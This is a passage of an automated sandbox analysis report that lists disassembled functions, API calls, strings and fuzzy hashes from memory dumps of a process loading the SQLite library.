                                                          • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                          • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                          • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                          • strcmp.MSVCRT ref: 6092A66A
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                          • String ID:
                                                          • API String ID: 1894734062-0
                                                          • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                          • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                          • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                          • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                          • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                          • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                          • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: into$out of
                                                          • API String ID: 632333372-1114767565
                                                          • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                          • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                          • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                          • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                          APIs
                                                            • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                          • sqlite3_free.SQLITE3 ref: 609193A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_value_text
                                                          • String ID: (NULL)$NULL
                                                          • API String ID: 2175239460-873412390
                                                          • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                          • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                          • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                          • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_log
• String ID: string or blob too big$|
• API String ID: 632333372-330586046
• Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
• Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
• Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
• Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_log
• String ID: d$|
• API String ID: 632333372-415524447
• Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
• Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
• Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
• Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_log
• String ID: -- $d
• API String ID: 632333372-777087308
• Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
• Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
• Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
• Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_logsqlite3_value_text
• String ID: string or blob too big
• API String ID: 2320820228-2803948771
• Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
• Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
• Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
• Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 60914096
• sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
• String ID:
• API String ID: 3265351223-3916222277
• Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
• Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
• Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
• Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: log
• API String ID: 912767213-2403297477
• Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
• Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
• Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
• Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_strnicmp
• String ID: SQLITE_
• API String ID: 1961171630-787686576
• Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
• Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
• Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
• Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
APIs
• sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
• sqlite3_value_blob.SQLITE3 ref: 6091A1FA
Strings
• Invalid argument to rtreedepth(), xrefs: 6091A1E3
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_value_blobsqlite3_value_bytes
• String ID: Invalid argument to rtreedepth()
• API String ID: 1063208240-2843521569
• Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
• Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
• Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
• Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
APIs
• sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
  • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
  • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
  • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
  • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
• sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
• String ID: soft_heap_limit
• API String ID: 1251656441-405162809
• Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
• Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
• Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
• Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
APIs
• sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
• sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
Strings
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: sqlite3_log
• String ID: NULL
• API String ID: 632333372-324932091
• Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
• Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
• Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
• Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
APIs
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: CriticalSection$EnterLeavefree
• String ID:
• API String ID: 4020351045-0
• Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
• Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
• Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
• Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
APIs
• EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
• TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
• GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
• LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
Memory Dump Source
• Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
• Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2